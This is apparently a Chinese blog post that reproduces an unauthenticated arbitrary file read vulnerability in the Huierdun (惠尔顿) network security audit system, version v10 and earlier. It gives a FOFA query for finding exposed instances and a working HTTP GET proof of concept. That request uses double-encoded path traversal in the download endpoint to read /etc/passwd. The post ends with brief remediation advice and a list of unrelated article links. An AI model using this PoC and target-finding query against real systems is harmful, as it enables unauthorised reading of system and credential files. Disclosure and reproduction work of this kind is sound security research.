当前位置: 首页 > news >正文

惠尔顿 网络安全审计系统 任意文件读取漏洞复现

0x01 产品简介

惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块;用户访问功能,内容过滤功能;流量控制功能、带宽管理功能;增强的应用安全扩展;强大的应用协议分析与报表功能。

0x02 漏洞概述

惠尔顿 网络安全审计系统download接口存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取系统内部敏感文件及凭证,使系统处于极不安全的状态。

0x03 影响范围

version <= v10

0x04 复现环境

FOFA:app="惠尔顿-网络安全审计系统"

0x05 漏洞复现

PoC

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

读取 /etc/passwd 文件

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关文章:

  • 蓝桥杯备赛系列——倒计时50天!
  • 解决windows无法访问wsl下docker服务
  • docker存储驱动
  • pikachu靶场-File Inclusion
  • flink反压
  • 【分布式事务 XA模式】MySQL XA模式详解
  • 003:高精地图数据采集
  • 使用 yarn 的时候,遇到 Error [ERR_REQUIRE_ESM]: require() of ES Module 怎么解决?
  • 快速排序C语言实现程序
  • 如何使用ArcGIS Pro生成等高线
  • 2024年软件测试岗位-面试
  • PyTorch概述(四)---DataLoader
  • 如何使用idea连接服务器上的mysql?
  • c# HttpCookie操作,建立cookie工具类
  • Python学习路线图
  • 【C++】类和对象之拷贝构造函数篇
  • docker install private registry 【docker 安装 registry 仅证书认证】
  • mybatis中foreach批量插入并返回主键
  • oppo手机如何录屏?解锁录屏新功能!
  • SQL 中如何实现多表关联查询?